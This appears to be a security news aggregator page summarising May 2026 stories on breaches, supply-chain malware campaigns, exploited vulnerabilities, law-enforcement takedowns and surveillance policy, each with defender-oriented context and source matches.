Signal says Canada’s Bill C-22 could force metadata collection and threaten encrypted messaging services
Surveillance & Privacy, Information Freedom, Policy & Regulation, Government, Technology & Software, Telecommunications, Consumers & General Public, Signal, Government of Canada
Citizen Lab highlights concerns that Canada’s proposed lawful-access Bill C-22 could undermine encryption protections and require messaging services to collect metadata. Signal said it would leave the Canadian market rather than comply if the bill mandated such access, while researchers said officials were unwilling to clearly protect encryption.
Why it matters: The proposal could materially affect users of encrypted messaging in Canada, especially journalists, dissidents, and human-rights defenders. Defenders and civil-society groups should track the bill because it may create surveillance obligations or drive privacy-preserving services out of the market.
Sources
Claire Posno 2026.05.25 93%
This is the same underlying policy story around Canada’s proposed Bill C-22. It adds Citizen Lab’s argument that the bill could also pave the way for a U.S.-Canada CLOUD Act agreement enabling foreign law-enforcement requests for real-time surveillance, including wiretaps and device hacking in Canada.
Anna Mackay 2026.05.14 100%
This article establishes a distinct policy and privacy story around Canada’s Bill C-22 and its potential impact on encrypted communications, with a concrete response from Signal.
Attackers exploit Ghost CMS SQL injection flaw CVE-2026-26980 to booby-trap hundreds of websites with ClickFix malware lures
Zero-Days & CVEs, Social Engineering & Phishing, Malware, Education, Finance & Banking, Technology & Software, Media & Entertainment, Consumers & General Public, Ghost
Attackers are using a Ghost CMS bug to hijack websites and show visitors fake verification prompts that can infect their computers. The campaign abuses CVE-2026-26980, a critical unauthenticated SQL injection flaw affecting Ghost 3.24.0 through 6.19.0, to steal admin API keys and inject malicious JavaScript into article pages; researchers say more than 700 domains were hit, including university, media, fintech, and tech sites. Visitors who follow the ClickFix instructions paste attacker-supplied commands on their Windows systems, and those commands download malware.
Why it matters: This affects both website owners and ordinary visitors: unpatched Ghost sites can be silently turned into malware delivery pages, and people browsing them can be tricked into infecting their own systems. Ghost administrators should update to 6.19.1 or later immediately, rotate exposed keys, and check for injected scripts and suspicious admin API activity.
Sources
Eduard Kovacs 2026.05.25 98%
This source is a direct update on the same underlying event: active exploitation of Ghost CMS CVE-2026-26980 to compromise websites and inject ClickFix-related malicious JavaScript. It adds concrete scope and victim detail, saying more than 700 sites were hacked, including sites tied to DuckDuckGo, Harvard, and Oxford, and notes at least two groups are competing in the poisoning campaign.
Bill Toulas 2026.05.24 100%
This article establishes a distinct security story by tying active, large-scale exploitation of Ghost CMS CVE-2026-26980 to website compromises and downstream ClickFix malware delivery across more than 700 domains.
Oncology Institute says third-party vendor breach exposed patient data across its cancer-care network
Breaches & Data Leaks, Supply Chain, Healthcare, Technology & Software, The Oncology Institute, TriZetto Provider Solutions, Cognizant
The Oncology Institute says a breach at an outside software services provider affected patient information in its systems. TOI said Kroll notified it on May 20, 2026 that the vendor detected unauthorized access to TOI information systems, including systems containing patient data; the vendor was not named, but the timeline and disclosure process point to Cognizant-owned TriZetto Provider Solutions as a possible match. TOI operates more than 100 clinics across five U.S. states.
Why it matters: Cancer patients and healthcare staff may face privacy risks and follow-on fraud if their information was exposed. Affected users should watch for breach notices and suspicious calls or emails, while healthcare organizations using the same vendor should review exposure and incident-response steps immediately.
Sources
Eduard Kovacs 2026.05.25 100%
This article establishes a distinct victim disclosure tied to a third-party healthcare software provider breach, with TOI newly confirming that patient data was affected.
Radiology Associates of Richmond says 266,000 people were affected by a breach that exposed medical and personal data
Breaches & Data Leaks, Healthcare, Consumers & General Public, Radiology Associates of Richmond
Radiology Associates of Richmond disclosed that hackers stole files containing sensitive patient information, affecting 266,183 people. The organization says attackers accessed internal systems on or about July 25, 2025, and a forensic investigation completed in April 2026 found unauthorized acquisition of files with protected health information. State filings indicate exposed data may include names, Social Security numbers, government ID numbers, financial account or payment-card details, and medical and health insurance information.
Why it matters: This is significant because it involves health data plus identity and financial information, raising risks of medical-identity fraud and broader identity theft. Affected people should watch for official notice letters, use offered credit monitoring if eligible, and monitor medical, insurance, and financial accounts for misuse.
Sources
Ionut Arghire 2026.05.25 100%
The article establishes a distinct breach event at Radiology Associates of Richmond with its own victim count, timeline, and disclosure details; it does not match any existing tracked story.
Laravel Lang Composer packages hijacked through rewritten Git tags to deliver credential-stealing malware
Breaches & Data Leaks | Supply Chain | Malware | Technology & Software | Cryptocurrency & Blockchain | Consumers & General Public | Laravel Lang | GitHub
Attackers compromised Laravel Lang localization packages and made legitimate-looking Composer installs fetch malware instead. The attackers rewrote existing GitHub release tags across laravel-lang/lang, laravel-lang/http-statuses, laravel-lang/attributes, and possibly laravel-lang/actions to point to malicious commits in a fork, affecting hundreds of historical versions; the payload drops a PHP stealer that targets cloud keys, CI/CD secrets, SSH keys, browser data, crypto wallets, and on Windows launches a helper executable dubbed DebugElevator to decrypt Chromium-based browser credentials.
Why it matters: Developers and organizations that installed these packages could have had passwords, cloud credentials, and deployment secrets stolen without realizing it. Treat this as urgent: identify affected installs, remove compromised versions, rotate any exposed secrets, and review developer and build systems for follow-on access.
Sources
Ionut Arghire 2026.05.25 99%
This article covers the same Laravel-Lang package compromise and adds concrete details on the attack timeline, the four affected packages, the use of rewritten Git tags pointing to commits in a malicious fork, the C2 domain flipboxstudio[.]info, and the breadth of targeted secrets that defenders should rotate.
Lawrence Abrams 2026.05.23 100%
This article establishes a distinct supply-chain attack centered on the Laravel Lang package ecosystem, with a specific compromise method (Git tag rewriting) and malware payload, and it does not match any existing tracked story.
DocketWise says breach of third-party repositories exposed sensitive law firm and immigration case data for 143,000 people
Breaches & Data Leaks | Technology & Software | Legal & Professional Services | Consumers & General Public | DocketWise
DocketWise says hackers accessed data tied to more than 143,000 people after cloning third-party partner repositories used in its data migration pipeline. The exposed records may include names, addresses, dates of birth, Social Security numbers, passport and driver's license data, financial account and payment card information, tax IDs, health insurance details, and medical condition or treatment information. The company says it began investigating in October 2025 and later determined some cloned repositories contained DocketWise law firm records.
Why it matters: People whose information was exposed face a real risk of identity theft, account fraud, and targeted scams, especially because the stolen data includes government IDs, financial details, and medical information. Affected users should watch for notice letters, enable fraud alerts or credit freezes where appropriate, and be cautious of messages claiming to help with immigration or legal matters.
Sources
Ionut Arghire 2026.05.25 100%
This article appears to be the first concrete disclosure here of the DocketWise breach, including the victim count, the type of data exposed, and the stated attack path through cloned third-party repositories.
Megalodon campaign poisons more than 5,500 GitHub repositories to steal CI/CD and cloud credentials
Breaches & Data Leaks | Supply Chain | Malware | Technology & Software | GitHub | Bitbucket | Amazon Web Services | Google Cloud | Microsoft | Tiledesk
A new automated attack dubbed Megalodon pushed malicious commits to more than 5,500 GitHub repositories, putting developers and organizations that merge those changes at risk of credential theft. Researchers say the malware runs in continuous integration and continuous delivery (CI/CD) pipelines after a poisoned commit is merged, then steals GitHub, Bitbucket, AWS, Google Cloud, Azure, SSH, Docker, Kubernetes, Vault, and Terraform secrets and can spread further; SafeDep also linked backdoored Tiledesk npm releases 2.18.6 through 2.18.12 to a compromised GitHub repository rather than a stolen npm account.
Why it matters: This can turn a routine code merge into a cloud-account and source-code compromise, especially for organizations that automatically build code from GitHub. Repo maintainers and security teams should review recent pull requests and commits, block suspicious automation, rotate CI/CD and cloud secrets, and check whether affected packages or repositories were used.
Sources
Ionut Arghire 2026.05.25 98%
This article is a direct report on the same Megalodon event, adding specifics on the attack window (May 18 over six hours), the 5,718 malicious commits across 5,561 repositories, the use of GitHub Actions workflows including workflow_dispatch for dormant backdoors, and the link to compromised Tiledesk npm package releases published from poisoned source code.
2026.05.22 100%
The article establishes a distinct new supply-chain campaign, separate from the tracked TeamPCP and Mini Shai-Hulud incidents, with a different actor, larger scope, and specific poisoned GitHub repos and Tiledesk package versions.
Italy dismantles CINEMAGOAL app operation that stole Netflix, Disney+, Sky, DAZN and Spotify access codes
Scams & Fraud | Media & Entertainment | Consumers & General Public | Government | Netflix | Disney+ | Sky | DAZN | Spotify | Eurojust
Italian authorities say they dismantled CINEMAGOAL, a piracy app operation that let customers watch paid streaming services by using stolen or fraudulently obtained access credentials. Investigators say the system used virtual machines in Italy to capture valid authentication and decryption codes from legitimate subscriptions every three minutes, then redistributed them through servers seized in France and Germany. The probe, coordinated with Eurojust, included 100 searches, identified more than 70 resellers, and also disrupted a related IPTV service.
Why it matters: This matters because it was not just copyright infringement but a large-scale unauthorized-access and fraud scheme built around stolen streaming credentials and infrastructure designed to hide users. Streaming providers and affected subscribers should watch for fraudulent account creation and abuse, while defenders should note the use of virtual machines, foreign servers, crypto payments, and fake identities to operate the service.
Sources
Bill Toulas 2026.05.23 100%
The article establishes a distinct new enforcement story centered on the CINEMAGOAL app and its method of harvesting and redistributing valid streaming authentication codes.
Underminr CDN routing flaw lets attackers disguise malicious traffic as connections to trusted domains
Zero-Days & CVEs | Malware | Threat Actors & APTs | Technology & Software | Telecommunications | Government
Researchers say attackers are exploiting a weakness in shared content delivery network (CDN) infrastructure to make malicious connections look like they are going to legitimate websites. The technique, dubbed Underminr, is described as a variant of domain fronting that abuses mismatches between DNS lookups, server name indication (SNI), HTTP Host headers, edge IP addresses, and CDN tenant routing; ADAMnetworks says it affects roughly 88 million domains and has been used to bypass Protective DNS filtering, conceal command-and-control traffic, and tunnel VPN or proxy connections over TCP port 443.
Why it matters: Organizations that rely on DNS filtering or allowlists could miss malicious outbound traffic that appears to be headed to trusted domains. Defenders should review CDN egress controls, correlate DNS, SNI, Host header, and destination IP telemetry, and watch for guidance or mitigations from affected providers.
Sources
Ionut Arghire 2026.05.23 100%
This article appears to be the first tracked report establishing Underminr as a distinct, named CDN abuse technique with active exploitation and broad defensive implications.
TrendAI says Russian-speaking scammer used jailbroken Gemini to target QAnon and MAGA users with wallet theft and WordPress credential attacks
Social Engineering & Phishing | Scams & Fraud | Malware | Technology & Software | Cryptocurrency & Blockchain | Consumers & General Public | Google | WordPress | Telegram
A Russian-speaking threat actor allegedly used a jailbroken Google Gemini account to run a months-long scam and theft campaign aimed at QAnon and MAGA communities, stealing WordPress admin credentials and draining at least one victim's cryptocurrency wallets. TrendAI says the operation ran from September 2025 to May 2026 through a Telegram channel with about 17,000 subscribers, used 73 likely stolen Gemini API keys, pushed a fake StellarMonster wallet app that actually installed the GoToResolve remote access tool, and captured victims' seed phrases through a bogus wallet-import screen.
Why it matters: This matters because it blends political-community targeting, AI-assisted social engineering, malware, and direct crypto theft in a way ordinary users can fall for and defenders may miss. Users should avoid wallet apps and recovery prompts promoted in Telegram channels, while organizations should investigate exposed WordPress credentials and watch for abuse of stolen API keys.
Sources
2026.05.22 100%
This article appears to be the first tracked report establishing this specific TrendAI-described campaign by the actor bandcampro using jailbroken Gemini, fake crypto-wallet software, and Telegram-based persona fraud.
CISA contractor exposed AWS GovCloud and internal agency credentials in public GitHub repository
Breaches & Data Leaks | Supply Chain | Government | Technology & Software | CISA | Amazon Web Services
KrebsOnSecurity reports that a public GitHub repository maintained by a CISA contractor exposed sensitive internal files, plaintext passwords, tokens, and administrative credentials for three AWS GovCloud accounts and other CISA systems. Researchers said some credentials were valid and could authenticate to high-privilege GovCloud environments, and the repository also exposed internal software build and artifactory access details.
Why it matters: This is a major breach-risk event affecting a U.S. federal cybersecurity agency, with potential impact on internal systems, software supply-chain integrity, and government cloud environments. Affected parties need credential rotation, repository auditing, and investigation of possible unauthorized access.
Sources
BrianKrebs 2026.05.22 99%
This is a direct follow-up on the same CISA 'Private-CISA' GitHub exposure, adding that congressional lawmakers are demanding answers and that CISA was still trying to revoke exposed credentials days after notification, including a reportedly still-valid RSA key tied to a GitHub app with broad access to CISA repositories and CI/CD secrets.
SecurityWeek News 2026.05.22 96%
This roundup directly recaps the same incident, adding that the public repository was named "Private-CISA," that the exposure lasted for months, and that the leaked material included administrative keys for multiple AWS GovCloud accounts and plaintext passwords that could have enabled lateral movement or software-package tampering.
Bruce Schneier 2026.05.22 99%
This is the same underlying event: a CISA contractor's public GitHub repository exposing privileged AWS GovCloud credentials and internal CISA deployment and system details; it mainly amplifies the severity and points readers to the reported leak.
2026.05.19 98%
This is the same underlying GitHub exposure event and adds specifics from The Register and GitGuardian on the repository contents, file names, duration of exposure, disclosure timeline, and CISA's response.
BrianKrebs 2026.05.18 100%
This article appears to be the first tracked report establishing the underlying event: a public GitHub leak of valid CISA internal and GovCloud credentials.
Former C.A. Cloud executives plead guilty to helping tech-support scam networks route and hide fraudulent calls
Scams & Fraud | Social Engineering & Phishing | Policy & Regulation | Technology & Software | Telecommunications | Consumers & General Public | C.A. Cloud | Microsoft | Apple
Two former executives of call-tracking firm C.A. Cloud pleaded guilty to concealing a years-long tech-support scam operation that targeted victims worldwide. Prosecutors say the company knowingly provided phone numbers, call forwarding, recordings, and rotating number pools to fraudsters behind fake malware-warning pop-ups, including scammers impersonating Microsoft and Apple; the pair also allegedly ran a Tunisia call center where employees carried out similar fraud through remote computer access and false invoices.
Why it matters: This matters because it shows the infrastructure behind tech-support scams is being targeted, not just the callers themselves, and the scams often hit older and vulnerable people. Users should be wary of pop-ups or calls claiming their computer is infected, especially if they demand remote access or immediate payment.
Sources
Sergiu Gatlan 2026.05.22 100%
The article establishes a distinct enforcement story about C.A. Cloud executives admitting they knowingly supported tech-support fraud infrastructure, rather than a generic trend piece or a duplicate of an existing tracked case.
U.S. Supreme Court weighs whether Google geofence warrants violate Americans’ privacy rights in Chatrie case
Surveillance & Privacy | Policy & Regulation | Government | Technology & Software | Legal & Professional Services | Consumers & General Public | Google | U.S. Supreme Court
The U.S. Supreme Court is considering whether police can use geofence warrants to make Google hand over location-history data for everyone near a crime scene, a ruling that could affect millions of users. The case, Chatrie, centers on a Fourth Amendment challenge to a reverse warrant that sought unknown suspects by searching Google location data across a defined area and time window; the outcome could also shape the legality of broader reverse searches such as keyword or AI-chat queries.
Why it matters: This could change how easily law enforcement can obtain bulk location and other sensitive platform data about people who are not suspects. It matters to anyone whose phone or online accounts generate location history, and to privacy defenders, platforms, and policymakers watching limits on digital searches.
Sources
2026.05.22 100%
This article establishes a new tracked story because it centers on the pending Supreme Court decision in Chatrie as a distinct legal event with broad implications for geofence warrants and related reverse-search practices.
Canadian police arrest alleged Kimwolf botnet operator over record-scale DDoS attacks
Policy & Regulation | Malware | Threat Actors & APTs | Technology & Software | Consumers & General Public | Government | U.S. Department of Justice
Canadian authorities arrested Ottawa resident Jacob Butler, alleged online as “Dort,” and U.S. prosecutors unsealed charges accusing him of running the Kimwolf Internet-of-Things botnet that hijacked millions of connected devices. The complaint says Kimwolf infected devices such as cameras and digital photo frames, issued more than 25,000 attack commands, powered distributed denial-of-service attacks measured at nearly 30 terabits per second, and was also rented to other criminals; the case follows March seizures of Kimwolf infrastructure and related botnets Aisuru, JackSkid, and Mossad.
Why it matters: This matters to internet providers, enterprises, and anyone running exposed connected devices because it shows how insecure Internet-of-Things products can be turned into large-scale attack infrastructure. Defenders should keep internet-facing devices patched, disable unnecessary exposure, and review mitigations tied to the exploitation path Kimwolf used to spread.
Sources
2026.05.22 98%
This is the same underlying event: the arrest of Ottawa resident Jacob Butler, alleged to be 'Dort,' over operating the KimWolf DDoS-for-hire botnet. The article adds specifics from the unsealed U.S. complaint, including the charge of aiding and abetting computer intrusion, the claim that KimWolf infected more than 1 million devices, issued over 25,000 attack commands, generated attacks approaching 30 Tbps, and was linked to attacks including one against Department of Defense IP space.
Eduard Kovacs 2026.05.22 99%
This article is the same underlying event: the arrest of Ottawa resident Jacob Butler ('Dort') as the alleged Kimwolf botnet operator, with added detail from the Justice Department on the extradition request, the specific aiding-and-abetting computer intrusion charge, and seizure warrants targeting services supporting 45 DDoS-for-hire platforms linked to the botnet.
Sergiu Gatlan 2026.05.22 99%
This article covers the same underlying event: the arrest and charging of Jacob Butler, allegedly known as "Dort," as the suspected KimWolf botnet administrator. It adds details from the unsealed U.S. complaint, the extradition posture, the specific aiding-and-abetting charge, losses to victims, and related seizures of 45 DDoS-for-hire platforms tied to the broader disruption effort.
BrianKrebs 2026.05.21 100%
This article establishes a distinct story because it is the first item here centered on the arrest and cross-border criminal charges against the alleged operator of the Kimwolf IoT botnet.
CISA opens public reporting channel for Known Exploited Vulnerabilities catalog nominations
Zero-Days & CVEs | Policy & Regulation | Government | Technology & Software | CISA
CISA has launched a new public form and email pathway for researchers, vendors, and industry partners to submit vulnerabilities for possible inclusion in its Known Exploited Vulnerabilities (KEV) catalog. The change affects no single CVE or product; instead it creates a formal process for reporting suspected exploited-in-the-wild flaws to CISA, with submitters asked to provide vulnerability details and evidence of active exploitation so the agency can validate and potentially add them to KEV.
Why it matters: The KEV catalog is one of the main lists defenders use to decide what to patch first, so a faster path for outside researchers to report exploitation could speed warnings and remediation across government and private networks. Security teams should expect KEV to remain a key prioritization source and monitor for any changes in how quickly new exploited bugs are added.
Sources
SecurityWeek News 2026.05.22 88%
The article notes CISA's new KEV nomination form as one of the week's items, which is the same policy/process update about opening a public channel for Known Exploited Vulnerabilities submissions.
2026.05.22 100%
This article establishes a distinct story about CISA changing the KEV intake process itself, rather than adding any specific vulnerability already tracked.
Huawei enterprise router zero-day caused a nationwide telecom blackout in Luxembourg
Zero-Days & CVEs | Information Freedom | Telecommunications | Consumers & General Public | Huawei | POST Luxembourg
A zero-day flaw in Huawei enterprise router software was blamed for a July 2025 outage that knocked out landline, 4G, and 5G service across Luxembourg for more than three hours. POST Luxembourg said specially crafted network traffic forced the routers into a reboot loop, causing a denial-of-service condition and disrupting emergency communications for hundreds of thousands of residents. No CVE is provided, and it remains unclear whether Huawei has issued a patch.
Why it matters: This shows how a single unpatched network-device flaw can interrupt phone and mobile service for an entire country, including emergency calls. Organizations using Huawei enterprise routers should urgently seek vendor guidance, limit exposure, and prepare mitigations because patch status is still unclear.
Sources
SecurityWeek News 2026.05.22 100%
The article provides a concrete new event: a previously undisclosed Huawei router vulnerability linked to a real-world national telecom outage.
TrendAI patches exploited Apex One zero-day CVE-2026-34926 in on-premises servers
Zero-Days & CVEs | Urgent Patches | Technology & Software | Government | Trend Micro | CISA
TrendAI says attackers exploited a flaw in its Apex One security software before a patch was available, putting organizations that run the on-premises server at risk. The bug, CVE-2026-34926, is a directory traversal vulnerability in Apex One on-premises that can let an attacker alter a key server table and inject malicious code for deployment to agents; TrendAI says admin credentials to the server are required, and CISA has added the CVE to its Known Exploited Vulnerabilities catalog.
Why it matters: Organizations using Apex One on-premises should treat this as urgent because the flaw was exploited in real attacks and could let attackers push malicious code from the management server to protected endpoints. Apply TrendAI's update immediately and review who has administrative and remote access to the Apex One server.
Sources
Sergiu Gatlan 2026.05.22 98%
This article covers the same underlying event: Trend Micro's patch and warning for the actively exploited Apex One on-premises zero-day CVE-2026-34926. It adds concrete detail that the bug is a directory traversal issue allowing code injection to agents from the server, notes Trend observed at least one in-the-wild exploit attempt, and mentions CISA's KEV listing and June 4 federal patch deadline.
Eduard Kovacs 2026.05.22 100%
This article appears to be the first tracked item here for CVE-2026-34926, covering the vendor patch, in-the-wild exploitation, affected product scope, and CISA KEV inclusion.
Ubiquiti patches five UniFi OS flaws, including three maximum-severity bugs that can be exploited remotely
Urgent Patches | Zero-Days & CVEs | Technology & Software | Consumers & General Public | Ubiquiti
Ubiquiti released security updates for UniFi OS after disclosing five vulnerabilities that could let attackers tamper with devices, read files, or run commands. The issues include CVE-2026-34908, CVE-2026-34909, and CVE-2026-34910, all rated maximum severity, plus CVE-2026-33000 and CVE-2026-34911. They affect UniFi OS on UniFi Consoles that run UniFi Network, Protect, Access, Talk, and Connect; the flaws involve improper access control, path traversal, command injection, and information disclosure. Ubiquiti says the bugs can be exploited with low complexity and nearly 100,000 internet-exposed endpoints have been observed.
Why it matters: Organizations and home or small-business users running UniFi OS may be exposed to remote compromise if their management devices are reachable online. This is an update-now issue: apply Ubiquiti's patches promptly and reduce internet exposure of UniFi management interfaces where possible.
Sources
Sergiu Gatlan 2026.05.22 100%
This article appears to be the first clear report of Ubiquiti's May 2026 UniFi OS patch release covering CVE-2026-34908, CVE-2026-34909, CVE-2026-34910, CVE-2026-33000, and CVE-2026-34911, which is distinct from the previously tracked March 2026 UniFi Network Application flaws.
Europol-led operation seizes First VPN service used by ransomware and cybercrime actors
Threat Actors & APTs | Ransomware | Europol
French and Dutch authorities, with Europol and partners from 16 countries, seized 33 servers and multiple domains tied to the 'First VPN' service, which investigators say was widely used in ransomware, fraud, and data-theft attacks. Authorities arrested or questioned a Ukrainian administrator, infiltrated the service, and said intelligence from the takedown identified thousands of users, with 506 users and 83 intelligence packages shared internationally.
Why it matters: The takedown targets a criminal privacy service that allegedly supported major cybercrime operations and may generate follow-on investigations into ransomware and data-theft cases. Defenders and incident responders should watch for new attribution and victim-notification leads emerging from the seized data.
Sources
Eduard Kovacs 2026.05.22 98%
This article covers the same First VPN takedown and adds that the alleged administrator was arrested in Ukraine, reiterates FBI details that at least 25 ransomware groups used the service, and notes investigators shared data on 506 identified users plus published IoCs and ATT&CK mappings.
Bill Toulas 2026.05.21 100%
This article appears to be the first tracked report of the coordinated seizure of First VPN infrastructure and the identification of its users.
2026.05.20 98%
This article covers the same Europol-led takedown of First VPN, adding details that the operation occurred May 19-20, involved France, the Netherlands and Ukraine, dismantled 33 servers, and yielded a user database exposing thousands of users tied to ransomware, fraud, and data-theft investigations.
Grafana GitHub breach traced to missed token rotation after TanStack npm supply-chain attack
Threat Actors & APTs | Supply Chain | Breaches & Data Leaks | Technology & Software | Grafana | GitHub | TanStack
Grafana says attackers gained access to its private GitHub repositories after a GitHub workflow token was missed during rotation following the TanStack npm supply-chain attack. The malicious TanStack package executed in Grafana's CI/CD environment, exfiltrated workflow tokens, and led to theft of source code plus some operational business contact information. Grafana says no customer production systems or cloud data were affected.
Why it matters: This matters to defenders because it shows how downstream victims of an npm supply-chain compromise can remain exposed if token rotation is incomplete. Organizations using GitHub Actions and affected TanStack packages should review CI/CD secrets, token scope, and repository access logs.
Sources
Ionut Arghire 2026.05.22 99%
This article is a direct update on the same Grafana incident, adding that Grafana attributes the intrusion to the TanStack/Mini Shai-Hulud supply-chain attack, says attackers downloaded public and private source code plus internal operational and business-contact data, and notes the attackers sent a ransom demand that Grafana refused to pay.
Sergiu Gatlan 2026.05.21 74%
The article connects GitHub’s breach to the same underlying TanStack npm supply-chain campaign that also affected Grafana, providing additional context on the broader attack chain, Nx Console compromise, and TeamPCP-linked activity.
Bill Toulas 2026.05.20 100%
The article provides substantive new facts about the Grafana breach itself, specifically tying the intrusion to the TanStack package compromise and a missed GitHub token rotation, and it does not match any listed existing tracked story.
2026.05.18 73%
This is the same underlying TanStack/Shai-Hulud supply-chain event referenced in the Grafana story, and adds specific root-cause and mitigation details from TanStack: abuse of pull_request_target, GitHub Actions cache poisoning, removal of that workflow pattern, cache disabling, SHA pinning, stronger 2FA, and discussion of invitation-only PRs.
House Democrats warn Trump budget cuts would reduce CISA and state-local cybersecurity funding
Policy & Regulation | Government | CISA | Department of Homeland Security | Multi-State Information Sharing and Analysis Center
U.S. House Democrats said the Trump administration is pushing major cuts to federal cybersecurity spending that would hit state and local governments. At a Homeland Security subcommittee hearing, lawmakers and state officials pointed to a proposed $707 million cut to the Cybersecurity and Infrastructure Security Agency (CISA), earlier cuts of about $135 million and roughly 1,000 staff, uncertainty around reauthorizing the State and Local Cybersecurity Grant Program, and the loss of federally supported Multi-State Information Sharing and Analysis Center services.
Why it matters: This matters because local governments run emergency services, schools, utilities, and courts, and many rely on federal cyber grants and shared defenses they cannot afford on their own. The practical implication is policy-focused rather than immediate patching: public-sector defenders and watchdogs should track the budget fight closely because fewer staff, grants, and shared services can increase exposure to ransomware and other attacks.
Sources
2026.05.21 100%
This article establishes a distinct policy story centered on proposed U.S. federal cybersecurity funding cuts and their impact on CISA and state/local cyber defense capacity, rather than a specific breach, CVE, or previously tracked legislative fight.
German hospitals disclose patient-data breach after attack on billing provider Unimed
Breaches & Data Leaks | Surveillance & Privacy | Healthcare | Insurance | Unimed | University Hospital Cologne | University Hospital Freiburg | Heidelberg University Hospital | University Hospital Tübingen | Ulm University Hospital
Several German university hospitals say hackers stole patient and billing data after breaching Unimed, an external provider used to process invoices for privately insured and self-paying patients. Disclosures from Cologne, Freiburg, Heidelberg, Tübingen, Ulm and Mannheim say the intrusion occurred in mid-April and exposed names, addresses, physician details, and in some cases diagnosis, treatment, communications, and limited bank or payment data. Hospitals said their own clinical systems were not breached and patient care was not disrupted.
Why it matters: This affects highly sensitive medical data, including some diagnosis and treatment information, so impacted patients may face privacy harms, impersonation attempts, or fraud. Affected hospitals have stopped sending data to Unimed; patients should watch for breach notices and be cautious of unsolicited calls, emails, or billing messages referencing their care.
Sources
2026.05.21 100%
This article establishes a distinct new breach event centered on Unimed's compromise and the resulting exposure of patient and billing records across multiple German hospitals.
Belarus-linked GhostWriter uses fake Prometheus training certificates to phish Ukrainian government officials
Threat Actors & APTs | Social Engineering & Phishing | Malware | Government | Education | CERT-UA | Prometheus
Belarus-linked hackers are sending fake course-certificate emails to Ukrainian government staff to infect their computers with espionage malware. CERT-UA says the campaign, active since spring 2026, uses compromised email accounts and messages posing as Ukraine’s Prometheus learning platform; a PDF leads victims to a ZIP that installs OysterFresh, then OysterBlues and OysterShuck, which collect host and user details and may later deliver Cobalt Strike.
Why it matters: This is a targeted government espionage campaign, so affected organizations should treat related Prometheus certificate emails as suspicious, hunt for the named malware and infrastructure, and isolate infected systems quickly. For users, the practical takeaway is not to open certificate attachments or download archives from unexpected training-platform emails, even if they come from known contacts.
Sources
2026.05.21 100%
The article establishes a distinct CERT-UA-attributed GhostWriter espionage operation using fake Prometheus certificate lures and the OysterFresh malware chain against Ukrainian officials.
Researchers say deleted Google API keys can remain usable for up to 23 minutes, enabling Gemini data access and billing abuse
Surveillance & Privacy | Technology & Software | Google
Security researchers found that Google API keys may keep working for up to 23 minutes after a user deletes them, leaving developers and organizations exposed during what they believe is a safe shutdown period. Aikido says revocation propagates unevenly across Google's infrastructure, allowing repeated authenticated requests to still succeed against some backend servers; if Gemini is enabled, attackers could access uploaded files and cached conversation context, and abuse automatic billing tier increases to run up large charges.
Why it matters: Anyone using Google APIs, especially Gemini, could still be exposed after deleting a leaked key. Treat key deletion alone as insufficient: rotate credentials quickly, restrict key permissions, watch for ongoing usage and billing spikes, and disable affected projects or services if abuse is underway.
Sources
2026.05.21 100%
This article establishes a distinct security story about delayed revocation of Google API keys and its concrete impact on unauthorized access and financial abuse, rather than updating an existing tracked event.
Full page
Ofcom says Snapchat, Meta and Roblox will change UK child-safety features, while TikTok and YouTube resist new commitments
Surveillance & Privacy, Policy & Regulation, Social Engineering & Phishing, Government, Technology & Software, Media & Entertainment, Consumers & General Public, Ofcom, Snap, Meta, Roblox, TikTok, YouTube
Britain’s online-safety regulator said several major platforms have promised product changes aimed at better protecting children in the UK. Ofcom said Snap will adopt its recommended anti-grooming measures, including tighter limits on adult contact with children; Roblox will let parents disable direct messages for under-16s; and Meta will hide teens’ connection lists by default on Instagram and use artificial intelligence to detect likely sexualized adult-teen direct messages. Ofcom said TikTok and YouTube did not commit to significant new changes.
Why it matters: This matters to UK families, teens and platform operators because it signals concrete safety and privacy changes tied to regulatory pressure, especially around grooming risks and minors’ visibility online. Users and parents should watch for new default settings and controls, while companies should expect closer enforcement under the UK’s online-safety regime.
Sources
2026.05.21 100%
This article establishes a distinct story about Ofcom extracting specific child-safety and anti-grooming platform commitments from major tech companies, with named product changes and a clear enforcement hook.
Full page
Google accidentally exposed details of an unfixed Chromium flaw that can keep malicious code running after the browser is closed
Zero-Days & CVEs, Urgent Patches, Technology & Software, Consumers & General Public, Google, Microsoft, Brave, Opera, Vivaldi, The Browser Company
Google briefly made public the technical details of an unfixed Chromium security flaw that affects Chrome and other Chromium-based browsers including Edge, Brave, Opera, Vivaldi, and Arc. Researcher Lyra Rebane says a malicious website can abuse a Service Worker to keep JavaScript running after the browser is closed, potentially enabling stealthy botnet-style abuse such as proxying traffic or launching distributed denial-of-service attacks; no CVE is listed in the report, and the bug was reportedly marked fixed in tracking systems even though current dev builds still appeared vulnerable.
Why it matters: This matters because simply visiting a malicious site once may be enough to leave a browser doing work in the background without the user's knowledge. Users and defenders should watch for an emergency browser update from Google and other Chromium-based vendors and apply it quickly once available.
Sources
Bill Toulas 2026.05.21 100%
This article establishes a new story because it centers on a distinct Chromium flaw whose accidental public exposure increased near-term exploitation risk before a real fix was shipped.
Full page
Two Americans plead guilty to helping India-based tech-support scam call centers target U.S. victims
Scams & Fraud, Social Engineering & Phishing, Telecommunications, Consumers & General Public
Two U.S. men pleaded guilty to helping India-based tech-support scam centers steal millions from Americans, including elderly and disabled victims. Prosecutors said they provided phone numbers, call routing, tracking, and forwarding services for fake malware pop-up scams from 2016 to 2022, continued after learning customers were fraudulent, and advised scammers to rotate large pools of numbers to evade detection; some victims also gave remote access to their devices, leading to financial theft.
Why it matters: This shows how large tech-support scam operations rely on telecom and call-routing support inside the U.S., not just overseas call centers. People should be wary of pop-ups telling them to call for urgent computer help, and providers and defenders can use the case details to spot number rotation and call-forwarding tactics tied to fraud.
Sources
2026.05.21 100%
This article establishes a distinct enforcement-focused story around guilty pleas tied to the infrastructure that enabled an India-based tech-support scam network, rather than updating any listed breach, malware, or policy story.
Full page
Access Now backs WhatsApp in Ninth Circuit appeal over NSO Pegasus spyware injunction
Surveillance & Privacy, Policy & Regulation, Technology & Software, Telecommunications, Nonprofits & NGOs, Consumers & General Public, WhatsApp, Meta, NSO Group, Access Now
Access Now and other civil society groups asked the Ninth Circuit to keep a court order blocking NSO Group from using WhatsApp to target users with Pegasus spyware. The filing concerns NSO’s appeal after WhatsApp and Meta won a permanent injunction and jury verdict in a case over Pegasus being delivered through WhatsApp’s servers to more than 1,400 people in 20 countries, including journalists, activists, and human rights defenders.
Why it matters: This matters because the appeal could shape how strongly U.S. courts can curb commercial spyware used against encrypted messaging users. It is especially relevant to people at risk of surveillance and to companies defending messaging platforms from spyware abuse.
Sources
Natalia Krapiva, Esq. 2026.05.21 100%
